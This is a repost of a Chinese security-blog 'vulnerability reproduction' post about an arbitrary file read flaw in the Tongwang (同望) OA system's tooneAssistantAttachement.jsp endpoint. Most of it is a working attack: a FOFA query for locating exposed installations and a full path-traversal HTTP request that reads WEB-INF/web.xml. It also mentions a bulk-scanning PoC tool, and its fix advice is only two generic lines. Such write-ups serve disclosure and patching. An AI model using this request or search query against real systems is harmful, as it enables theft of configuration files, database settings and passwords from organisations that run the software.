同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞

admin 2024年11月8日19:30:52评论14 views字数 1165阅读3分53秒阅读模式

免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
简介
同望OA是由同望科技打造的智企云协同管理系统,专为提升企业协同办公与移动管理效率而设计。秉承“互联网+企业管理”理念,该系统以移动互联办公为核心,搭建了一个灵活高效的企业管理软件平台。通过集成常用标准模块和专项管理应用,同望OA能够在确保数据安全的前提下,快速打通管理与业务通道,提供灵活的模块组合和稳定的功能支持,满足企业在不同管理场景中的多元需求。它将企业管理的柔性和刚性完美结合,使管理决策更敏捷、执行更稳健,全面支持企业内部高效协作与资源共享,最终助力企业实现协同价值的最大化,适应日益多变的商业环境。
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
漏洞描述
同望OA系统在/tooneAssistant/tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞,攻击者可以通过漏洞读取服务器敏感文件,如系统配置文件、数据库配置文件、账号密码等敏感信息。
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
fofa语法
body="loginAction.struts?actionType=blockLogin"
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
漏洞复现
读取/WEB-INF/web.xml配置文件GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../../WEB-INF/web.xml HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1Priority: u=0, i
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
批量检测(批量检测POC工具请在公众号知识星球获取):
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞
修复建议
1、防火墙添加临时黑名单;
2、联系厂商打补丁或升级版本。
网安交流群
同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞

原文始发于微信公众号(白帽攻防):【漏洞复现】同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日19:30:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   同望OA系统tooneAssistantAttachement.jsp接口处存在任意文件读取漏洞https://cn-sec.com/archives/3374199.html

发表评论

匿名网友 填写信息